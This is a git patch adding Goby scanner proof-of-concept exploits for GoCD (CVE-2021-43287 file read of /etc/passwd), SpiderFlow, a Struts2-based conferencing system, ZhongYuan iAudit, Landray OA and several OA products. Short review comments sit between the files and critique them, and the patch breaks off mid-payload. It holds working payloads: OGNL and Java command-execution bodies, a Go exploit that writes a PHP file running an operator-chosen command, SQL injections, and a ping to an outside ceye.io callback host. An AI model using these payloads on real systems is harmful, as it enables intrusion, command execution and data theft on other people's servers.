From 1ff094782523be09eede219ea36f47f2025c6ce4 Mon Sep 17 00:00:00 2001
From: JiaoZi00 <110288727+JiaoZi00@users.noreply.github.com>
Date: Wed, 3 Aug 2022 16:11:19 +0800
Subject: [PATCH] Add files via upload
---
goby_pocs/Cerebro_request_SSRF.json | 99 +++++++++++
...Arbitrary_file_reading_CVE_2021_43287.json | 99 +++++++++++
goby_pocs/SpiderFlow_save__remote_code.json | 99 +++++++++++
...uan_iAudit_get_luser_by_sshport.php_RCE.go | 104 +++++++++++
goby_pocs/feishimei_struts2_remote_code.json | 102 +++++++++++
...liOA_8000workFlowService_SQLinjection.json | 99 +++++++++++
goby_pocs/landray_oa_treexml_rce.go | 167 ++++++++++++++++++
.../qilaiOA_messageurl.aspx_SQLinjection.json | 99 +++++++++++
.../qilaiOA_treelist.aspx_SQLinjection.json | 102 +++++++++++
..._hospital_ioFileExport.aspx_file_read.json | 99 +++++++++++
10 files changed, 1069 insertions(+)
create mode 100644 goby_pocs/Cerebro_request_SSRF.json
create mode 100644 goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
create mode 100644 goby_pocs/SpiderFlow_save__remote_code.json
create mode 100644 goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go
create mode 100644 goby_pocs/feishimei_struts2_remote_code.json
create mode 100644 goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json
create mode 100644 goby_pocs/landray_oa_treexml_rce.go
create mode 100644 goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json
create mode 100644 goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json
create mode 100644 goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json
diff --git a/goby_pocs/Cerebro_request_SSRF.json b/goby_pocs/Cerebro_request_SSRF.json
new file mode 100644
index 0000000..23cff72
--- /dev/null
+++ b/goby_pocs/Cerebro_request_SSRF.json
@@ -0,0 +1,99 @@
+{
+ "Name": "fumengyun AjaxMethod.ashx SQL injection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "title=\"孚盟云\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "SELECT",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "SELECT",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-02 21:53:57",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
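Review bot: The file is named `Cerebro_request_SSRF.json`, but its `Name` is "fumengyun AjaxMethod.ashx SQL injection", its tag is `sqli` and its request goes to `/Ajax/AjaxMethod.ashx`, so either the wrong file was uploaded or the filename is stale; the filename should match the `Name`. `ExploitSteps` is a byte-for-byte copy of `ScanSteps` while `HasExp` is `true`, so the advertised exploit adds nothing over the scan and should be dropped with `"HasExp": false`. `Description`, `Product`, `Impact` and `Recommendation` are empty and `References` points only at the generic `https://gobies.org/`, which leaves anyone triaging a hit with no remediation guidance; the same empty metadata appears in GoCD_Arbitrary_file_reading_CVE_2021_43287.json, SpiderFlow_save__remote_code.json, feishimei_struts2_remote_code.json, huatiandongliOA_8000workFlowService_SQLinjection.json, qilaiOA_messageurl.aspx_SQLinjection.json, qilaiOA_treelist.aspx_SQLinjection.json and red_fan_OA_hospital_ioFileExport.aspx_file_read.json.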
diff --git a/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json b/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
new file mode 100644
index 0000000..f2c5095
--- /dev/null
+++ b/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
@@ -0,0 +1,99 @@
+{
+ "Name": "GoCD Arbitrary file reading CVE-2021-43287",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "title=\"Login - Go\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-15 22:05:52",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
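Review bot: The CVE identifier is carried only inside the `Name` string; the descriptor has no `CVEIDs` entry (the two Go descriptors in this patch carry that key), so the PoC cannot be filtered or cross-referenced by CVE — add `"CVEIDs": ["CVE-2021-43287"]` next to `Tags`. `ExploitSteps` repeats `ScanSteps` verbatim, so `"HasExp": true` advertises an exploit that is just the scan run a second time. `Recommendation` is empty although this is a published, fixed CVE; the remediation (upgrade to the vendor's patched release) belongs there rather than in a generic `https://gobies.org/` reference.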
diff --git a/goby_pocs/SpiderFlow_save__remote_code.json b/goby_pocs/SpiderFlow_save__remote_code.json
new file mode 100644
index 0000000..c24e075
--- /dev/null
+++ b/goby_pocs/SpiderFlow_save__remote_code.json
@@ -0,0 +1,99 @@
+{
+ "Name": "SpiderFlow save remote code",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "title=\"SpiderFlow\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/function/save",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping amth5e.ceye.io');{",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "exec",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-07 22:15:11",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
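Review bot: The scan payload's out-of-band callback is a hard-coded third-party domain (`ping amth5e.ceye.io`) that the scanner never observes — the `ResponseTest` only checks for `exec` in the body — so the callback proves nothing to the scan, while a host on which it fires would disclose itself to whoever controls that ceye account; an OOB probe needs a scanner-controlled listener or should be removed from the scan step. `ExploitSteps` is an unrelated placeholder (`GET /test.php`, body contains `test`) that can never demonstrate this vulnerability, yet `HasExp` is `true`; the identical placeholder is pasted into feishimei_struts2_remote_code.json, huatiandongliOA_8000workFlowService_SQLinjection.json, qilaiOA_messageurl.aspx_SQLinjection.json, qilaiOA_treelist.aspx_SQLinjection.json and red_fan_OA_hospital_ioFileExport.aspx_file_read.json and should be removed (with `"HasExp": false`) in each. The scan step also executes a command on the target rather than probing passively, which the empty `Impact` should state so operators can decide whether to run it.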
diff --git a/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go b/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go
new file mode 100644
index 0000000..f2e867f
--- /dev/null
+++ b/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go
@@ -0,0 +1,104 @@
+package exploits
+
+import (
+ "fmt"
+ "git.gobies.org/goby/goscanner/goutils"
+ "git.gobies.org/goby/goscanner/jsonvul"
+ "git.gobies.org/goby/goscanner/scanconfig"
+ "git.gobies.org/goby/httpclient"
+ "strings"
+)
+
+func init() {
+ expJson := `{
+ "Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE",
+ "Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability",
+ "Product": "ZhongYuan iAudit",
+ "Homepage": "https://www.tosec.com.cn/",
+ "DisclosureDate": "2021-06-01",
+ "Author": "PeiQi",
+ "GobyQuery": "body=\"admin.php?controller=admin_index&action=chklogin&ref\"",
+ "Level": "3",
+ "Impact": "
The existence of command splicing leads to remote command execution vulnerability
",
+ "Recommendation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Cmd",
+ "type": "input",
+ "value": "id"
+ }
+ ],
+ "ScanSteps": [
+ "AND"
+ ],
+ "ExploitSteps": null,
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": [
+ "WangKang Next generation firewall"
+ ],
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ },
+ "Recommandation": "Upgrade version
"
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
+ randomStr := goutils.RandomHexString(8) + ".php"
+ uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
+ cfg_1 := httpclient.NewGetRequestConfig(uri_1)
+ cfg_1.VerifyTls = false
+ cfg_1.FollowRedirect = false
+ cfg_1.Header.Store("Content-type", "application/json")
+ if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil {
+ if resp.StatusCode == 200 {
+ uri_2 := "/" + randomStr
+ cfg_2 := httpclient.NewGetRequestConfig(uri_2)
+ cfg_2.VerifyTls = false
+ cfg_2.FollowRedirect = false
+ cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
+ if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil {
+ return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid")
+ }
+ }
+ }
+ return false
+ },
+ func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
+ randomStr := goutils.RandomHexString(8) + ".php"
+ cmd := ss.Params["Cmd"].(string)
+ uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
+ cfg_1 := httpclient.NewGetRequestConfig(uri_1)
+ cfg_1.VerifyTls = false
+ cfg_1.FollowRedirect = false
+ cfg_1.Header.Store("Content-type", "application/json")
+ if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil {
+ if resp.StatusCode == 200 {
+ uri_2 := "/" + randomStr
+ cfg_2 := httpclient.NewGetRequestConfig(uri_2)
+ cfg_2.VerifyTls = false
+ cfg_2.FollowRedirect = false
+ cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
+ if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil {
+ expResult.Output = resp.Utf8Html
+ expResult.Success = true
+ }
+ }
+ }
+ return expResult
+ },
+ ))
+}
\ No newline at end of file
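Review bot: `expJson` is not valid JSON if the line breaks shown inside the `Impact` value (`"Impact": "` followed by the text on its own line and a closing `",`) and inside `Recommandation` (`"Upgrade version` then a lone `"`) are really in the file and not a rendering artifact — RFC 8259 forbids raw control characters in strings, so a strict parser rejects the descriptor at load time; collapse each to one line or use `\n`. `"fmt"` is imported but never used anywhere in `init`, which Go rejects at compile time (`imported and not used`). `Recommandation` is a misspelling of the `Recommendation` key that already appears (empty) a few lines earlier, so the "Upgrade version" text is never surfaced, and `AttackSurfaces.Application` names "WangKang Next generation firewall" while `Product` is "ZhongYuan iAudit" — copy-paste residue from another descriptor. Both callbacks write a PHP file into the target's web root and rely on the follow-up request reaching it to trigger `unlink(__FILE__)`; when `DoHttpRequest` errors on that second request the file stays behind, so the check leaves an artifact on the scanned host that an `ExpTips` entry (absent here) should disclose.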
diff --git a/goby_pocs/feishimei_struts2_remote_code.json b/goby_pocs/feishimei_struts2_remote_code.json
new file mode 100644
index 0000000..15fcc44
--- /dev/null
+++ b/goby_pocs/feishimei_struts2_remote_code.json
@@ -0,0 +1,102 @@
+{
+ "Name": "feishimei struts2 remote code",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "title=\"飞视美视频会议系统\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/confinfoaction!showallConfinfos.action",
+ "follow_redirect": true,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43mycmd\\75\\'ipconfig\\'')(d))&(h)(('\\43myret\\75@java.lang.Runtime@getRuntime().exec(\\43mycmd)')(d))&(i)(('\\43mydat\\75new\\40java.io.DataInputStream(\\43myret.getInputStream())')(d))&(j)(('\\43myres\\75new\\40byte[51020]')(d))&(k)(('\\43mydat.readFully(\\43myres)')(d))&(l)(('\\43mystr\\75new\\40java.lang.String(\\43myres)')(d))&(m)(('\\43myout\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\\43myout.getWriter().println(\\43mystr)')(d))",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "IP",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-07 22:39:00",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
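Review bot: The scan step is itself command execution — the OGNL body runs `ipconfig` on the target and the check is merely that the body contains `IP` — so a "scan" hit means an OS command was run on the host, which the empty `Description` and `Impact` must say so operators can decide whether this belongs in a passive sweep. `$body contains "IP"` on a 200 is also weak evidence: any page that happens to mention "IP" satisfies it, so hits need manual confirmation. `References` should point at the vendor/Struts security bulletin for this injection rather than the generic `https://gobies.org/`, and `CVEIDs` should be filled in if one applies.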
diff --git a/goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json b/goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json
new file mode 100644
index 0000000..b697c5d
--- /dev/null
+++ b/goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json
@@ -0,0 +1,99 @@
+{
+ "Name": "huatiandongliOA 8000workFlowService SQLinjection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "app=\"Hua Tian Power -Oa8000\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/OAapp/bfapp/buffalo/workFlowService",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": " \r\ngetDataListForTree \r\nselect user() \r\n",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "user",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-11 22:59:15",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/landray_oa_treexml_rce.go b/goby_pocs/landray_oa_treexml_rce.go
new file mode 100644
index 0000000..afd9a37
--- /dev/null
+++ b/goby_pocs/landray_oa_treexml_rce.go
@@ -0,0 +1,167 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
+ "Description": "蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限
",
+ "Product": "蓝凌OA",
+ "Homepage": "www.landray.com.cn",
+ "DisclosureDate": "2022-07-18",
+ "Author": "",
+ "FofaQuery": "app=\"Landray-OA系统\"",
+ "GobyQuery": "app=\"Landray-OA系统\"",
+ "Level": "3",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html"
+ ],
+ "Is0day": false,
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "command",
+ "type": "input",
+ "value": "whoami",
+ "show": ""
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/data/sys-common/treexml.tmpl",
+ "follow_redirect": true,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
+ "Accept-Encoding": "gzip, deflate",
+ "cmd": "echo This page has a bug",
+ "Accept": "*/*",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+n
ew+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "This page has a bug",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/data/sys-common/treexml.tmpl",
+ "follow_redirect": true,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
+ "Accept-Encoding": "gzip, deflate",
+ "cmd": "{{{command}}}",
+ "Accept": "*/*",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\